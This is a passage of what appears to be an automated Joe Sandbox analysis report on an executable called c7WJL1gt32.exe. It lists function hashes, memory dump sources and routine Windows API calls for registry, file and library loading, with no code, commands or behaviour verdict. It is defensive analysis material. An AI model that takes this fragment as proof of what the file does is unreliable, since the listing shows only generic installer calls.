                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                          • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                          • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                          • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                          • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                          • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                          • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                          • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                          • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                          • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                          • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                          • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                          • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                          • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                          • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                          • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                          • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                          • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                          • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                          • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                          • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                          APIs
                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 397863658-0
                                                                                                          • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                          • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                          • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                          • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,ogram cannot be run in DOS mode.$,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                          Strings
                                                                                                          • ogram cannot be run in DOS mode.$, xrefs: 00405F61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID: ogram cannot be run in DOS mode.$
                                                                                                          • API String ID: 2738559852-3978178379
                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                          • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                          • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FE7B,ogram cannot be run in DOS mode.$,004033DE,ogram cannot be run in DOS mode.$,0040FE7B,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                          Strings
                                                                                                          • ogram cannot be run in DOS mode.$, xrefs: 00405F90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID: ogram cannot be run in DOS mode.$
                                                                                                          • API String ID: 3934441357-3978178379
                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                          • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                          • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                          • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                          • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                          • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3356406503-0
                                                                                                          • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                          • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                          • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                          • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                          APIs
                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                          • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                          • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                          • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                          APIs
                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 2831762973-0
                                                                                                          • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                          • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                          • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                          • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1136574915-0
                                                                                                          • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                          • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                          • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                          • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                            • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547128583-0
                                                                                                          • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                          • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                          • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                          • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00405EE2
                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
